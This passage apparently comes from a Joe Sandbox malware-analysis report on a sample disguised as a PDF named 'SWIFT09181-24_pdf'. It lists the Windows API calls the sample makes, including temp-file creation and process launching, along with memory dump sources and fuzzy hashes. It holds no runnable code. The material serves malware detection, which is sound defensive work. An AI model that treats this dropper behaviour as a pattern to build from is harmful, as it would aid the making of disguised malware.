                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: nsa
                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                    • API String ID: 0-2732225958
                                                                                                                                    • Opcode ID: 88199b9f02605e9015a5e4e5bbe1f356c6b448e87fb4155272e715f67702a55a
                                                                                                                                    • Instruction ID: 9c860ebb91e4e89742f969184c8ee6d8f67a4ca40495c92638264a52d9a656f9
                                                                                                                                    • Opcode Fuzzy Hash: 88199b9f02605e9015a5e4e5bbe1f356c6b448e87fb4155272e715f67702a55a
                                                                                                                                    • Instruction Fuzzy Hash: 4A31E934D00319DFCF668B7985403AEBBB2AF84302F1440A9CC65AB255EB70CD88CB92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                    • API String ID: 0-3001612457
                                                                                                                                    • Opcode ID: dd79d3332297f530360b9175a19edcb8b018421703274388367ebb876385430b
                                                                                                                                    • Instruction ID: 2aa2bdf15fc98b29e15e7eb24b691f63853fc428d1353ea60d25da674c6442f0
                                                                                                                                    • Opcode Fuzzy Hash: dd79d3332297f530360b9175a19edcb8b018421703274388367ebb876385430b
                                                                                                                                    • Instruction Fuzzy Hash: 3801D431740905CFCB688E2DC46492577EBAF88B7A7264469E866CF3B0DB32DC498781
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9